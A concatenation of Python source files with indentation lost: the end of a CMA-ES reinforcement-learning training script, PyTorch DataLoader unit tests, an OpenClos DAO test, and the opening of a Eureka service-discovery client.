(total_steps, test_mean, test_ste, -np.min(cost), elapsed_time))
training_rewards.append(test_mean)
training_steps.append(total_steps)
training_timestamps.append(elapsed_time)
# with open('data/%s-best_solution_%s.bin' % (TAG, config.task), 'wb') as f:
# pickle.dump(solutions[np.argmin(result)], f)
if config.max_steps and total_steps > config.max_steps:
stop.value = True
break
cost = fitness_shift(cost)
es.tell(solutions, cost)
# es.disp()
for normalizer in normalizers:
stats.merge(normalizer.online_stats)
normalizer.online_stats.zero()
for normalizer in normalizers:
normalizer.offline_stats.load(stats)
stop.value = True
for w in workers: w.join()
return [training_rewards, training_steps, training_timestamps]
def test(config, solution, stats):
normalizer = StaticNormalizer(config.state_dim)
normalizer.offline_stats.load_state_dict(stats.state_dict())
evaluator = Evaluator(config, normalizer)
evaluator.model.set_weight(solution)
rewards = []
for i in range(config.test_repetitions):
reward, _ = evaluator.single_run()
rewards.append(reward)
return np.mean(rewards), np.std(rewards) / config.repetitions
def multi_runs(config):
fh = logging.FileHandler('log/%s-%s.txt' % (config.tag, config.task))
fh.setLevel(logging.DEBUG)
logger.addHandler(fh)
stats = []
runs = 10
for run in range(runs):
logger.info('Run %d' % (run))
stats.append(train(config))
with open('data/%s-stats-%s.bin' % (config.tag, config.task), 'wb') as f:
pickle.dump(stats, f)
def all_tasks():
configs = []
hidden_size = 16
# config = PendulumConfig(hidden_size)
# configs.append(config)
# config = ContinuousLunarLanderConfig(hidden_size)
# configs.append(config)
config = BipedalWalkerConfig(hidden_size)
configs.append(config)
config = BipedalWalkerHardcore(hidden_size)
configs.append(config)
ps = []
for cf in configs:
cf.max_steps = int(1e7)
cf.num_workers = 8
cf.pop_size = 64
cf.sigma = 1
cf.tag = 'CMA-%d' % (hidden_size)
ps.append(mp.Process(target=multi_runs, args=(cf, )))
for p in ps: p.start()
for p in ps: p.join()
if __name__ == '__main__':
all_tasks()
|
test_dataloader.py
|
import math
import sys
import errno
import os
import ctypes
import signal
import torch
import time
import traceback
import unittest
import subprocess
from torch import multiprocessing as mp
from torch.utils.data import Dataset, TensorDataset, DataLoader, ConcatDataset
from torch.utils.data.dataset import random_split
from torch.utils.data.dataloader import default_collate, ExceptionWrapper, MANAGER_STATUS_CHECK_INTERVAL
from common import TestCase, run_tests, TEST_NUMPY, IS_WINDOWS, NO_MULTIPROCESSING_SPAWN, TEST_WITH_ROCM
# We cannot import TEST_CUDA from common_nn here, because if we do that,
# the TEST_CUDNN line from common_nn will be executed multiple times
# as well during the execution of this test suite, and it will cause
# CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
# We need spawn start method for test_manager_unclean_exit, but
# Python 2.7 doesn't allow it.
if sys.version_info[0] == 3:
# Get a multiprocessing context because some test / third party library will
# set start_method when imported, and setting again triggers RuntimeError.
mp = mp.get_context(method='spawn')
JOIN_TIMEOUT = 17.0 if IS_WINDOWS else 6.5
class TestDatasetRandomSplit(TestCase):
def test_lengths_must_equal_datset_size(self):
with self.assertRaises(ValueError):
random_split([1, 2, 3, 4], [1, 2])
def test_splits_have_correct_size(self):
splits = random_split([1, 2, 3, 4, 5, 6], [2, 4])
self.assertEqual(len(splits), 2)
self.assertEqual(len(splits[0]), 2)
self.assertEqual(len(splits[1]), 4)
def test_splits_are_mutually_exclusive(self):
data = [5, 2, 3, 4, 1, 6]
splits = random_split(data, [2, 4])
all_values = []
all_values.extend(list(splits[0]))
all_values.extend(list(splits[1]))
data.sort()
all_values.sort()
self.assertListEqual(data, all_values)
class TestTensorDataset(TestCase):
def test_len(self):
source = TensorDataset(torch.randn(15, 10, 2, 3, 4, 5), torch.randperm(15))
self.assertEqual(len(source), 15)
def test_getitem(self):
t = torch.randn(15, 10, 2, 3, 4, 5)
l = torch.randn(15, 10)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_getitem_1d(self):
t = torch.randn(15)
l = torch.randn(15)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_single_tensor(self):
t = torch.randn(5, 10)
source = TensorDataset(t)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t[i], source[i][0])
def test_many_tensors(self):
t0 = torch.randn(5, 10, 2, 3, 4, 5)
t1 = torch.randn(5, 10)
t2 = torch.randn(5, 10, 2, 5)
t3 = torch.randn(5, 10, 3, 7)
source = TensorDataset(t0, t1, t2, t3)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t0[i], source[i][0])
self.assertEqual(t1[i], source[i][1])
self.assertEqual(t2[i], source[i][2])
self.assertEqual(t3[i], source[i][3])
class TestConcatDataset(TestCase):
def test_concat_two_singletons(self):
result = ConcatDataset([[0], [1]])
self.assertEqual(2, len(result))
self.assertEqual(0, result[0])
self.assertEqual(1, result[1])
def test_concat_two_non_singletons(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_two_non_singletons_with_empty(self):
# Adding an empty dataset somewhere is correctly handled
result = ConcatDataset([[0, 1, 2, 3, 4],
[],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_raises_index_error(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
with self.assertRaises(IndexError):
# this one goes to 11
result[11]
def test_add_dataset(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d2 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d3 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
result = d1 + d2 + d3
self.assertEqual(21, len(result))
self.assertEqual(0, (d1[0][0] - result[0][0]).abs().sum())
self.assertEqual(0, (d2[0][0] - result[7][0]).abs().sum())
self.assertEqual(0, (d3[0][0] - result[14][0]).abs().sum())
# Stores the first encountered exception in .exception.
# Inspired by https://stackoverflow.com/a/33599967
class ErrorTrackingProcess(mp.Process):
def __init__(self, *args, **kwargs):
super(ErrorTrackingProcess, self).__init__(*args, **kwargs)
self._pconn, self._cconn = mp.Pipe()
self._exception = None
def run(self):
# Disable stderr printing from os level, and make workers not printing
# to stderr.
# Can't use sys.stderr.close, otherwise Python `raise` will error with
# ValueError: I/O operation on closed file.
os.close(sys.stderr.fileno())
try:
super(ErrorTrackingProcess, self).run()
self._cconn.send(None)
except Exception as e:
self._cconn.send(ExceptionWrapper(sys.exc_info()))
raise
@property
def exception(self):
if self._pconn.poll():
self._exception = self._pconn.recv()
if self._exception is None:
return None
else:
return self._exception.exc_type(self._exception.exc_msg)
# ESRCH means that os.kill can't finds alive proc
def send_signal(self, signum, ignore_ESRCH=False):
try:
os.kill(self.pid, signum)
except OSError as e:
if not ignore_ESRCH or e.errno != errno.ESRCH:
raise
class ErrorDataset(Dataset):
def __init__(self, size):
self.size = size
def __len__(self):
return self.size
class SegfaultDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return ctypes.string_at(0)
def __len__(self):
return self.size
class SleepDataset(Dataset):
def __init__(self, size, sleep_sec):
self.size = size
self.sleep_sec = sleep_sec
def __getitem__(self, idx):
time.sleep(self.sleep_sec)
return idx
def __len__(self):
return self.size
class SeedDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return torch.initial_seed()
def __len__(self):
return self.size
# Inspired by https://stackoverflow.com/a/26703365
# This will ensure that each worker at least processes one data
class SynchronizedSeedDataset(Dataset):
def __init__(self, size, num_workers):
assert size >= num_workers
self.count = mp.Value('i', 0, lock=True)
self.barrier = mp.Semaphore(0)
self.num_workers = num_workers
self.size = size
def __getitem__(self, idx):
with self.count.get_lock():
self.count.value += 1
if self.count.value == self.num_workers:
self.barrier.release()
self.barrier.acquire()
self.barrier.release()
return torch.initial_seed()
def __len__(self):
return self.size
def _test_timeout():
dataset = SleepDataset(10, 10)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1)
_ = next(iter(dataloader))
def _test_segfault():
dataset = SegfaultDataset(10)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2)
_ = next(iter(dataloader))
# test custom init function
def init_fn(worker_id):
torch.manual_seed(12345)
class TestDataLoader(TestCase):
def setUp(self):
self.data = torch.randn(100, 2, 3, 5)
self.labels = torch.randperm(50).repeat(2)
self.dataset = TensorDataset(self.data, self.labels)
def _test_sequential(self, loader):
batch_size = loader.batch_size
for i, (sample, target) in enumerate(loader):
idx = i * batch_size
self.assertEqual(sample, self.data[idx:idx + batch_size])
self.assertEqual(target, self.labels[idx:idx + batch_size])
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_shuffle(self, loader):
found_data = {i: 0 for i in range(self.data.size(0))}
found_labels = {i: 0 for i in range(self.labels.size(0))}
batch_size = loader.batch_size
for i, (batch_samples, batch_targets) in enumerate(loader):
for sample, target in zip(batch_samples, batch_targets):
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1) * batch_size)
self.assertEqual(sum(found_labels.values()), (i + 1) * batch_size)
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_error(self, loader):
it = iter(loader)
errors = 0
while True:
try:
next(it)
except NotImplementedError:
errors += 1
except StopIteration:
self.assertEqual(errors,
math.ceil(float(len(loader.dataset)) / loader.batch_size))
return
def test_invalid_assign_after_init(self):
dl = DataLoader(self.dataset)
for attr in ('batch_size', 'sampler', 'drop_last'):
def fn():
setattr(dl, attr, {})
self.assertRaises(ValueError, fn)
def test_sequential(self):
self._test_sequential(DataLoader(self.dataset))
def test_sequential_batch(self):
self._test_sequential(DataLoader(self.dataset, batch_size=2))
def test_growing_dataset(self):
dataset = [torch.ones(4) for _ in range(4)]
dataloader_seq = DataLoader(dataset, shuffle=False)
dataloader_shuffle = DataLoader(dataset, shuffle=True)
dataset.append(torch.ones(4))
self.assertEqual(len(dataloader_seq), 5)
self.assertEqual(len(dataloader_shuffle), 5)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_sequential_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_multiple_dataloaders(self):
loader1_it = iter(DataLoader(self.dataset, num_workers=1))
loader2_it = iter(DataLoader(self.dataset, num_workers=2))
next(loader1_it)
next(loader1_it)
next(loader2_it)
next(loader2_it)
next(loader1_it)
next(loader2_it)
@unittest.skip("temporarily disable until flaky failures are fixed")
def test_segfault(self):
p = ErrorTrackingProcess(target=_test_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
if IS_WINDOWS:
self.assertIsInstance(p.exception, OSError)
self.assertRegex(str(p.exception), r'access violation reading ')
else:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
finally:
p.terminate()
def test_timeout(self):
p = ErrorTrackingProcess(target=_test_timeout)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader timed out after \d+ seconds')
finally:
p.terminate()
def test_worker_seed(self):
num_workers = 6
dataset = SynchronizedSeedDataset(num_workers, num_workers)
dataloader = DataLoader(dataset, batch_size=1, num_workers=num_workers)
seeds = set()
for batch in dataloader:
seeds.add(batch[0])
self.assertEqual(len(seeds), num_workers)
def test_worker_init_fn(self):
dataset = SeedDataset(4)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2,
worker_init_fn=init_fn)
for batch in dataloader:
self.assertEqual(12345, batch[0])
self.assertEqual(12345, batch[1])
def test_shuffle(self):
self._test_shuffle(DataLoader(self.dataset, shuffle=True))
def test_shuffle_batch(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True))
def test_sequential_workers(self):
self._test_sequential(DataLoader(self.dataset, num_workers=4))
def test_seqential_batch_workers(self):
self._test_sequential(DataLoader(self.dataset, batch_size=2, num_workers=4))
def test_shuffle_workers(self):
self._test_shuffle(DataLoader(self.dataset, shuffle=True, num_workers=4))
def test_shuffle_batch_workers(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4))
def _test_batch_sampler(self, **kwargs):
# [(0, 1), (2, 3, 4), (5, 6), (7, 8, 9), ...]
batches = []
for i in range(0, 100, 5):
batches.append(tuple(range(i, i + 2)))
batches.append(tuple(range(i + 2, i + 5)))
dl = DataLoader(self.dataset, batch_sampler=batches, **kwargs)
self.assertEqual(len(dl), 40)
for i, (input, _target) in enumerate(dl):
if i % 2 == 0:
offset = i * 5 // 2
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[offset:offset + 2])
else:
offset = i * 5 // 2
self.assertEqual(len(input), 3)
self.assertEqual(input, self.data[offset:offset + 3])
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_batch_sampler(self):
self._test_batch_sampler()
self._test_batch_sampler(num_workers=4)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_shuffle_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy(self):
import numpy as np
class TestDataset(torch.utils.data.Dataset):
def __getitem__(self, i):
return np.ones((2, 3, 4)) * i
def __len__(self):
return 1000
loader = DataLoader(TestDataset(), batch_size=12)
batch = next(iter(loader))
self.assertIsInstance(batch, torch.DoubleTensor)
self.assertEqual(batch.size(), torch.Size([12, 2, 3, 4]))
def test_error(self):
self._test_error(DataLoader(ErrorDataset(100), batch_size=2, shuffle=True))
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_error_workers(self):
self._test_error(DataLoader(ErrorDataset(41), batch_size=2, shuffle=True, num_workers=4))
@unittest.skipIf(IS_WINDOWS, "FIXME: stuck test")
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_partial_workers(self):
"check that workers exit even if the iterator is not exhausted"
loader = iter(DataLoader(self.dataset, batch_size=2, num_workers=4, pin_memory=True))
workers = loader.workers
worker_manager_thread = loader.worker_manager_thread
for i, sample in enumerate(loader):
if i == 3:
break
del loader
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive(), 'subprocess not terminated')
self.assertEqual(w.exitcode, 0)
worker_manager_thread.join(JOIN_TIMEOUT)
self.assertFalse(worker_manager_thread.is_alive())
@staticmethod
def _manager_process(dataset, worker_pids, manager_exit_event):
loader = iter(DataLoader(dataset, batch_size=2, num_workers=4, pin_memory=True))
workers = loader.workers
for i in range(len(workers)):
worker_pids[i] = int(workers[i].pid)
for i, sample in enumerate(loader):
if i == 3:
break
# Simulate a dirty exit of the manager process
manager_exit_event.set()
if IS_WINDOWS:
os.system('taskkill /PID ' + str(os.getpid()) + ' /F')
else:
os.kill(os.getpid(), signal.SIGKILL)
@staticmethod
def _is_process_alive(pid, pname):
# There is a chance of a terminated child process's pid being reused by a new unrelated process,
# but since we are looping this check very frequently, we will know that the child process dies
# before the new unrelated process starts.
if IS_WINDOWS:
command = 'tasklist | find "{}" /i'.format(pid)
else:
command = 'ps -p {} -o comm='.format(pid)
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
p_status = p.wait()
output = output.decode('utf-8')
return pname in output
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
@unittest.skipIf(sys.version_info[0] == 2,
"spawn start method is not supported in Python 2, \
but we need it for creating another process with CUDA")
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_main_process_unclean_exit(self):
'''There might be ConnectionResetError or leaked semaphore warning (due to dirty process exit), \
but they are all safe to ignore'''
worker_pids = mp.Array('i', [0] * 4)
manager_exit_event = mp.Event()
p = mp.Process(target=TestDataLoader._manager_process,
args=(self.dataset, worker_pids, manager_exit_event))
p.start()
manager_exit_event.wait()
exit_status = [False] * len(worker_pids)
start_time = time.time()
pname = 'python'
while True:
for i in range(len(worker_pids)):
pid = worker_pids[i]
if not exit_status[i]:
if not TestDataLoader._is_process_alive(pid, pname):
exit_status[i] = True
if all(exit_status):
break
else:
time.sleep(1)
self.assertFalse(time.time() - start_time > MANAGER_STATUS_CHECK_INTERVAL + JOIN_TIMEOUT,
'subprocess not terminated')
def test_len(self):
def check_len(dl, expected):
self.assertEqual(len(dl), expected)
n = 0
for sample in dl:
n += 1
self.assertEqual(n, expected)
check_len(self.dataset, 100)
check_len(DataLoader(self.dataset, batch_size=2), 50)
check_len(DataLoader(self.dataset, batch_size=3), 34)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_scalars(self):
import numpy as np
class ScalarDataset(torch.utils.data.Dataset):
def __init__(self, dtype):
self.dtype = dtype
def __getitem__(self, i):
return self.dtype()
def __len__(self):
return 4
dtypes = {
np.float64: torch.DoubleTensor,
np.float32: torch.FloatTensor,
np.float16: torch.HalfTensor,
np.int64: torch.LongTensor,
np.int32: torch.IntTensor,
np.int16: torch.ShortTensor,
np.int8: torch.CharTensor,
np.uint8: torch.ByteTensor,
}
for dt, tt in dtypes.items():
dset = ScalarDataset(dt)
loader = DataLoader(dset, batch_size=2)
batch = next(iter(loader))
self.assertIsInstance(batch, tt)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_colate_bad_numpy_types(self):
import numpy as np
# Should be a no-op
arr = np.array(['a', 'b', 'c'])
default_collate(arr)
arr = np.array([[['a', 'b', 'c']]])
self.assertRaises(TypeError, lambda: default_collate(arr))
arr = np.array([object(), object(), object()])
self.assertRaises(TypeError, lambda: default_collate(arr))
arr = np.array([[[object(), object(), object()]]])
self.assertRaises(TypeError, lambda: default_collate(arr))
class StringDataset(Dataset):
def __init__(self):
self.s = '12345'
def __len__(self):
return len(self.s)
def __getitem__(self, ndx):
return (self.s[ndx], ndx)
class TestStringDataLoader(TestCase):
def setUp(self):
self.dataset = StringDataset()
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_shuffle_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for batch_ndx, (s, n) in enumerate(loader):
self.assertIsInstance(s[0], str)
self.assertTrue(n.is_pinned())
class DictDataset(Dataset):
def __len__(self):
return 4
def __getitem__(self, ndx):
return {
'a_tensor': torch.Tensor(4, 2).fill_(ndx),
'another_dict': {
'a_number': ndx,
},
}
class TestDictDataLoader(TestCase):
def setUp(self):
self.dataset = DictDataset()
def test_sequential_batch(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=False)
batch_size = loader.batch_size
for i, sample in enumerate(loader):
idx = i * batch_size
self.assertEqual(set(sample.keys()), {'a_tensor', 'another_dict'})
self.assertEqual(set(sample['another_dict'].keys()), {'a_number'})
t = sample['a_tensor']
self.assertEqual(t.size(), torch.Size([batch_size, 4, 2]))
self.assertTrue((t[0] == idx).all())
self.assertTrue((t[1] == idx + 1).all())
n = sample['another_dict']['a_number']
self.assertEqual(n.size(), torch.Size([batch_size]))
self.assertEqual(n[0], idx)
self.assertEqual(n[1], idx + 1)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
for batch_ndx, sample in enumerate(loader):
self.assertTrue(sample['a_tensor'].is_pinned())
self.assertTrue(sample['another_dict']['a_number'].is_pinned())
class TestWorkerQueueDataset(Dataset):
def __init__(self, data):
self.data = data
self.worker_id = None
def worker_init_fn(self, worker_id):
self.worker_id = worker_id
def __getitem__(self, item):
return self.worker_id, self.data[item]
def __len__(self):
return len(self.data)
class TestIndividualWorkerQueue(TestCase):
def setUp(self):
self.dataset = TestWorkerQueueDataset([i for i in range(128)])
def _run_ind_worker_queue_test(self, batch_size, num_workers):
loader = DataLoader(
self.dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers,
worker_init_fn=self.dataset.worker_init_fn
)
current_worker_idx = 0
for i, (worker_ids, sample) in enumerate(loader):
self.assertEqual(worker_ids.tolist(), [current_worker_idx] * batch_size)
self.assertEqual(sample.tolist(), [j for j in range(i * batch_size, (i + 1) * batch_size)])
current_worker_idx += 1
if current_worker_idx == num_workers:
current_worker_idx = 0
@unittest.skipIf(TEST_WITH_ROCM, "test doesn't currently work on the ROCm stack")
def test_ind_worker_queue(self):
for batch_size in (8, 16, 32, 64):
for num_workers in range(1, 6):
self._run_ind_worker_queue_test(batch_size=batch_size, num_workers=num_workers)
if __name__ == '__main__':
run_tests()
|
test_dao.py
|
'''
Created on Aug 26, 2014
@author: moloyc
'''
import unittest
from sqlalchemy import exc
from flexmock import flexmock
import jnpr.openclos.util
from jnpr.openclos.model import Pod, Device, Interface, InterfaceDefinition, TrapGroup
from jnpr.openclos.dao import AbstractDao
from jnpr.openclos.exception import InvalidConfiguration
class TestAbstractDao(unittest.TestCase):
def testInit(self):
with self.assertRaises(NotImplementedError):
AbstractDao()
class InMemoryDao(AbstractDao):
def _getDbUrl(self):
jnpr.openclos.propLoader.loadLoggingConfig(appName = 'unittest')
return 'sqlite:///'
class TestDao(unittest.TestCase):
def setUp(self):
self.__dao = InMemoryDao.getInstance()
def tearDown(self):
InMemoryDao._destroy()
def testInvalidConfig(self):
class BadDao(AbstractDao):
def _getDbUrl(self):
return 'unknown://'
with self.assertRaises(InvalidConfiguration):
BadDao()
def testCreateObjects(self):
from test_model import createDevice
with self.__dao.getReadWriteSession() as session:
device = createDevice(session, "test")
ifd1 = InterfaceDefinition('ifd1', device, 'downlink')
ifd2 = InterfaceDefinition('ifd2', device, 'downlink')
ifd3 = InterfaceDefinition('ifd3', device, 'downlink')
ifd4 = InterfaceDefinition('ifd4', device, 'downlink')
self.__dao.createObjects(session, [ifd1, ifd2, ifd3, ifd4])
with self.__dao.getReadSession() as session:
self.assertEqual(4, len(self.__dao.getAll(session, InterfaceDefinition)))
self.assertEqual(1, len(self.__dao.getObjectsByName(session, InterfaceDefinition, 'ifd1')))
self.assertEqual(1, len(self.__dao.getObjectsByName(session, InterfaceDefinition, 'ifd2')))
def testDeleteNonExistingPod(self):
dict = {'devicePassword': 'test'}
pod = Pod('unknown', dict)
with self.assertRaises(exc.InvalidRequestError):
with self.__dao.getReadWriteSession() as session:
self.__dao.deleteObject(session, pod)
def testCascadeDeletePodDevice(self):
from test_model import createDevice
with self.__dao.getReadWriteSession() as session:
device = createDevice(session, "test")
self.assertEqual(1, len(self.__dao.getAll(session, Pod)))
self.assertEqual(1, len(self.__dao.getAll(session, Device)))
self.__dao.deleteObject(session, device.pod)
with self.__dao.getReadSession() as session:
self.assertEqual(0, len(self.__dao.getAll(session, Pod)))
self.assertEqual(0, len(self.__dao.getAll(session, Device)))
def testCascadeDeletePodDeviceInterface(self):
from test_model import createInterface
with self.__dao.getReadWriteSession() as session:
interface = createInterface(session, "test")
self.assertEqual(1, len(self.__dao.getAll(session, Pod)))
self.assertEqual(1, len(self.__dao.getAll(session, Device)))
self.assertEqual(1, len(self.__dao.getAll(session, Interface)))
self.__dao.deleteObject(session, interface.device.pod)
with self.__dao.getReadSession() as session:
self.assertEqual(0, len(self.__dao.getAll(session, Pod)))
self.assertEqual(0, len(self.__dao.getAll(session, Device)))
self.assertEqual(0, len(self.__dao.getAll(session, Interface)))
def testGetObjectById(self):
from test_model import createPod
with self.__dao.getReadWriteSession() as session:
pod = createPod("test", session)
with self.__dao.getReadSession() as session:
self.assertEqual(1, len(self.__dao.getAll(session, Pod)))
def testGetConnectedInterconnectIFDsFilterFakeOnes(self):
from test_model import createDevice
with self.__dao.getReadWriteSession() as session:
device = createDevice(session, "test")
fakeSession = flexmock(session)
fakeSession.should_receive('query.filter.filter.filter.order_by.all').\
and_return([InterfaceDefinition("et-0/1/0", None, 'uplink'), InterfaceDefinition("et-0/1/1", None, 'uplink'),
InterfaceDefinition("uplink-2", None, 'uplink'), InterfaceDefinition("uplink-3", None, 'uplink')])
filteredIfds = self.__dao.getConnectedInterconnectIFDsFilterFakeOnes(fakeSession, device)
self.assertEqual(2, len(filteredIfds))
@unittest.skip('manual test')
def testConnectionCleanup(self):
import threading
import time
class MySqlDao(AbstractDao):
def _getDbUrl(self):
jnpr.openclos.propLoader.loadLoggingConfig(appName = 'unittest')
return 'mysql://root:<password>@localhost/openclos'
dao = MySqlDao.getInstance()
def getPods():
with dao.getReadWriteSession() as session:
return dao.getAll(session, Pod)
threads = []
for i in xrange(10):
threads.append(threading.Thread(target = getPods))
threads[i].start()
for thread in threads:
thread.join()
print 'done 10 threads'
time.sleep(40)
threads = []
for i in xrange(10):
threads.append(threading.Thread(target = getPods))
threads[i].start()
for thread in threads:
thread.join()
print 'done 10 threads'
time.sleep(40)
MySqlDao._destroy()
print 'done final __dao destroy'
time.sleep(30)
|
eureka_client.py
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2018 Keijack Wu
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import atexit
import json
import re
import socket
import time
import ssl
import random
import inspect
from copy import copy
from typing import Callable, Dict, List, Union
import xml.etree.ElementTree as ElementTree
from threading import Timer, RLock, Thread
from urllib.parse import quote
import py_eureka_client.http_client as http_client
import py_eureka_client.netint_utils as netint
from py_eureka_client.logger import get_logger
from py_eureka_client.__dns_txt_resolver import get_txt_dns_record
from py_eureka_client.__aws_info_loader import AmazonInfo
_logger = get_logger("eureka_client")
"""
Status of instances
"""
INSTANCE_STATUS_UP: str = "UP"
INSTANCE_STATUS_DOWN: str = "DOWN"
INSTANCE_STATUS_STARTING: str = "STARTING"
INSTANCE_STATUS_OUT_OF_SERVICE: str = "OUT_OF_SERVICE"
INSTANCE_STATUS_UNKNOWN: str = "UNKNOWN"
"""
Action type of instances
"""
ACTION_TYPE_ADDED: str = "ADDED"
ACTION_TYPE_MODIFIED: str = "MODIFIED"
ACTION_TYPE_DELETED: str = "DELETED"
"""
This is for the DiscoveryClient, when this strategy is set, get_service_url will random choose one of the UP instance and return its url
This is the default strategy
"""
HA_STRATEGY_RANDOM: int = 1
"""
This is for the DiscoveryClient, when this strategy is set, get_service_url will always return one instance until it is down
"""
HA_STRATEGY_STICK: int = 2
"""
This is for the DiscoveryClient, when this strategy is set, get_service_url will always return a new instance if any other instances are up
"""
HA_STRATEGY_OTHER: int = 3
"""
The error types that will send back to on_error callback function
"""
ERROR_REGISTER: str = "EUREKA_ERROR_REGISTER"
ERROR_DISCOVER: str = "EUREKA_ERROR_DISCOVER"
ERROR_STATUS_UPDATE: str = "EUREKA_ERROR_STATUS_UPDATE"
"""
The timeout seconds that all http request to the eureka server
"""
_DEFAULT_TIME_OUT = 5
"""
Default eureka server url.
"""
_DEFAULT_EUREKA_SERVER_URL = "http://127.0.0.1:8761/eureka/"
"""
Default instance field values
"""
_DEFAULT_INSTNACE_PORT = 9090
_DEFAULT_INSTNACE_SECURE_PORT = 9443
_RENEWAL_INTERVAL_IN_SECS = 30
_DURATION_IN_SECS = 90
_DEFAULT_DATA_CENTER_INFO = "MyOwn"
_DEFAULT_DATA_CENTER_INFO_CLASS = "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo"
_AMAZON_DATA_CENTER_INFO_CLASS = "com.netflix.appinfo.AmazonInfo"
"""
Default configurations
"""
_DEFAULT_ENCODING = "utf-8"
_DEFAUTL_ZONE = "default"
### =========================> Base Mehods <======================================== ###
### Beans ###
class LeaseInfo:
def __init__(self,
renewalIntervalInSecs: int = _RENEWAL_INTERVAL_IN_SECS,
